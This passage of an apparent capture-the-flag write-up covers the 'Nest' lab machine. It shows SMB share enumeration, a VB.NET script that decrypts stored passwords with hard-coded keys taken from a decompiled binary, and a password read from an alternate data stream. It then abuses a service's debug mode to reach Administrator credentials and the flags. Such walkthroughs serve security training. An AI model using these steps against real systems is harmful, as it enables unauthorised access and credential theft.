        Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes)
        Using memoryStream As New IO.MemoryStream()
            Using cryptoStream As New CryptoStream(memoryStream, _
                                                   encryptor, _
                                                   CryptoStreamMode.Write)
                cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length)
                cryptoStream.FlushFinalBlock()
                Dim cipherTextBytes As Byte() = memoryStream.ToArray()
                memoryStream.Close()
                cryptoStream.Close()
                Return Convert.ToBase64String(cipherTextBytes)
            End Using
        End Using
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        Return plainText
    End Function

End Class
```
Decrypting the Password
We can cut and patch some of this code together to make a single file we can run on dotnetfiddle. The password, salt, iteration count, IV and key size are all hard-coded in DecryptString, so the only input we need to supply is the base64 string from RU_config.xml. I put that string into the Return Decrypt line of the script; the decryption happens here:

Decrypt("HASH", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)

So, from:

```vb
Public Shared Function DecryptString(EncryptedString As String) As String
    If String.IsNullOrEmpty(EncryptedString) Then
        Return String.Empty
    Else
        Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
    End If
End Function
```

to:

```vb
Public Shared Function DecryptString(EncryptedString As String) As String
    If String.IsNullOrEmpty(EncryptedString) Then
        Return String.Empty
    Else
        Return Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
    End If
End Function
```

Execute this and we get the password xRxRxPANCAK3SxRxRx.
Exploitation
Enumerate C.Smith
So now that I have successfully decrypted the password, let's try logging in again with smbclient, this time to the Users share as C.Smith:

```bash
root in htb/boxes/Nest ❯ smbclient \\\\10.10.10.178\\Users -U C.Smith
Enter WORKGROUP\C.Smith's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .              D  0  Sun Jan 26 07:04:21 2020
  ..             D  0  Sun Jan 26 07:04:21 2020
  Administrator  D  0  Fri Aug 9 23:08:23 2019
  C.Smith        D  0  Sun Jan 26 15:21:44 2020
  L.Frost        D  0  Fri Aug 9 01:03:01 2019
  R.Thompson     D  0  Fri Aug 9 01:02:50 2019
  TempUser       D  0  Thu Aug 8 06:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
  .              D   0  Sun Jan 26 15:21:44 2020
  ..             D   0  Sun Jan 26 15:21:44 2020
  HQK Reporting  D   0  Fri Aug 9 07:06:17 2019
  user.txt       A  32  Fri Aug 9 07:05:24 2019

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*

\C.Smith\HQK Reporting
  .                        D    0  Fri Aug 9 07:06:17 2019
  ..                       D    0  Fri Aug 9 07:06:17 2019
  AD Integration Module    D    0  Fri Aug 9 20:18:42 2019
  Debug Mode Password.txt  A    0  Fri Aug 9 07:08:17 2019
  HQK_Config_Backup.xml    A  249  Fri Aug 9 07:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  .                        D      0  Fri Aug 9 20:18:42 2019
  ..                       D      0  Fri Aug 9 20:18:42 2019
  HqkLdap.exe              A  17408  Thu Aug 8 07:41:16 2019
```
So it looks like I can now get user.txt, as you can see in this listing:

```bash
smb: \> cd C.Smith
smb: \C.Smith\> ls
  .              D   0  Sun Jan 26 15:21:44 2020
  ..             D   0  Sun Jan 26 15:21:44 2020
  HQK Reporting  D   0  Fri Aug 9 07:06:17 2019
  user.txt       A  32  Fri Aug 9 07:05:24 2019

\C.Smith\HQK Reporting
  .                        D    0  Fri Aug 9 07:06:17 2019
  ..                       D    0  Fri Aug 9 07:06:17 2019
  AD Integration Module    D    0  Fri Aug 9 20:18:42 2019
  Debug Mode Password.txt  A    0  Fri Aug 9 07:08:17 2019
  HQK_Config_Backup.xml    A  249  Fri Aug 9 07:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  .                        D      0  Fri Aug 9 20:18:42 2019
  ..                       D      0  Fri Aug 9 20:18:42 2019
  HqkLdap.exe              A  17408  Thu Aug 8 07:41:16 2019

                10485247 blocks of size 4096. 6544137 blocks available
smb: \C.Smith\>
```
Grab the user flag
Finally I have user.txt; I downloaded it using smbclient:

```bash
smb: \C.Smith\> mget user.txt
Get file user.txt? y
getting file \C.Smith\user.txt of size 32 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \C.Smith\>
```

```bash
root in htb/boxes/Nest ❯ cut -c 4-12 user.txt
b25404be
```
Privilege Escalation
Going back to the first enumeration of C.Smith, there is an interesting .txt file and an executable, HqkLdap.exe, as you see in these lines:

```bash
\C.Smith\HQK Reporting
  .                        D    0  Thu Aug 8 19:06:17 2019
  ..                       D    0  Thu Aug 8 19:06:17 2019
  AD Integration Module    D    0  Fri Aug 9 08:18:42 2019
  Debug Mode Password.txt  A    0  Thu Aug 8 19:08:17 2019
  HQK_Config_Backup.xml    A  249  Thu Aug 8 19:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  .                        D      0  Fri Aug 9 08:18:42 2019
  ..                       D      0  Fri Aug 9 08:18:42 2019
  HqkLdap.exe              A  17408  Wed Aug 7 19:41:16 2019
```
I initially came across the Debug Mode Password.txt file and thought it could be used to authenticate to the DEBUG mode of the HQK Reporting Service v1.2 service running on port 4386, which we saw in our nmap scan. The file appeared to be 0 bytes. I spent some time searching further and couldn't find any other files of interest. After wasting some time on futile approaches, I eventually realized that the file could have alternate data streams on an NTFS file system. I enumerated the streams and retrieved the Password stream of the file:
smb: \C.Smith\HQK Reporting\> more DEBUGM~1.TXT:Password:$DATA
getting file \C.Smith\HQK Reporting\DEBUGM~1.TXT:Password:$DATA of size 15 as /tmp/smbmore.mFLHg4 (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
WBQ201953D8w
/tmp/smbmore.mFLHg4
smb: \C.Smith\>
If I run allinfo on it, I can see something else:
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug 8 07:06:12 PM 2019 EDT
access_time:    Thu Aug 8 07:06:12 PM 2019 EDT
write_time:     Thu Aug 8 07:08:17 PM 2019 EDT
change_time:    Thu Aug 8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes

❯ cat Debug\ Mode\ Password.txt:Password
WBQ201953D8w
So this is really interesting: it shows the debug password, WBQ201953D8w. This will be useful later.
Enumeration with telnet
I'll connect again to HQK with telnet on port 4386 and start digging. We can then use the debug password to gain the ability to run the SHOWQUERY command on the HQK Reporting Service. This functionality can be used to read files. After spending some time searching around I came across the Ldap.conf file, which is located in ../LDAP/.
root in htb/boxes/Nest ❯ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>DEBUG WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available

>help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
>
I set the directory to HQK with SETDIR and list it:
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]    HqkSvc.exe
[2]    HqkSvc.InstallState
[3]    HQK_Config.xml

Current Directory: HQK
>setdir LDAP
Current directory set to LDAP
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[1]    HqkLdap.exe
[2]    Ldap.conf

Current Directory: LDAP
>
I try SHOWQUERY on Ldap.conf, and it gives us Administrator credentials, but the password looks encrypted again:
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[1]    HqkLdap.exe
[2]    Ldap.conf

Current Directory: LDAP
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
>
Analyzing the HqkLdap.exe
I downloaded HqkLdap.exe and analyzed it using JetBrains dotPeek, a free .NET decompiler and assembly browser:
smb: \C.Smith\HQK Reporting\AD Integration Module\> mget HqkLdap.exe
Get file HqkLdap.exe? y
getting file \C.Smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (7.5 KiloBytes/sec) (average 7.5 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\AD Integration Module\>
Looking at the CR module of the binary in dotPeek:
It contains the arguments that we have to pass to the same script with which we decrypted the user hash, because the hash we found in Ldap.conf is encrypted with another set of parameters (passphrase, salt, iteration count and IV). We take those from the CR module, pass them to the Decrypt function and compile it.
Debugging the HqkLdap.exe
Do you remember the VB script that decrypts the encrypted password? I use it again to decrypt the admin password hash as well. I replace only this line:
from
Decrypt("HASH", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
i.e. "fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256
to:
Decrypt("HASH", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)
i.e. "yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256
This is the final script:
# vb.net
Imports System.Text
Imports System
Imports System.Security.Cryptography

Public Module Module1
    Public Sub Main()
        ' Ciphertext from Ldap.conf; passphrase, salt, iterations and IV from the CR module of HqkLdap.exe
        Console.WriteLine(Decrypt("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256))
    End Sub

    Public Function Decrypt(ByVal cipherText As String, _
                            ByVal passPhrase As String, _
                            ByVal saltValue As String, _
                            ByVal passwordIterations As Integer, _
                            ByVal initVector As String, _
                            ByVal keySize As Integer) _
                            As String
        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)
        ' PBKDF2 (HMAC-SHA1) key derivation from the passphrase, salt and iteration count
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)
        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))
        ' AES-CBC with the fixed ASCII IV; PKCS#7 padding is the provider default
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)
        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)
        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)
        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)
        memoryStream.Close()
        cryptoStream.Close()
        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)
        Return plainText
    End Function
End Module
Copy and execute this in dotnetfiddle and we get the password:
Administrator password: XtH4nkS4Pl4y1nGX
Grabbing the root.txt
Sadly we can't use this with Evil-WinRM; we don't have a proper shell to get root.txt, only smbclient:
root in htb/boxes/Nest ❯ smbclient \\\\10.10.10.178\\c$ -U Administrator
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Sun Jan 26 15:20:50 2020
  ..                                 DR        0  Sun Jan 26 15:20:50 2020
  desktop.ini                       AHS      282  Sun Jan 26 06:02:44 2020
  root.txt                            A       32  Tue Aug 6 06:27:26 2019

                10485247 blocks of size 4096. 6545433 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Users\Administrator\Desktop\>
Download root.txt, and finally!
root in htb/boxes/Nest ❯ ls
'Debug Mode Password.txt'   HqkLdap.exe   IT   'Maintenance Alerts.txt'   nmap-Nest   Production   Reports   root.txt   Shared   user.txt   'Welcome Email.txt'
root in htb/boxes/Nest ❯ cut -c 4-12 root.txt
c2eb084bc
root in htb/boxes/Nest ❯
If you liked my writeup please leave a respect on my Profile
References:
dotPeek - .NET Decompiler and Assembly
dotnetfiddle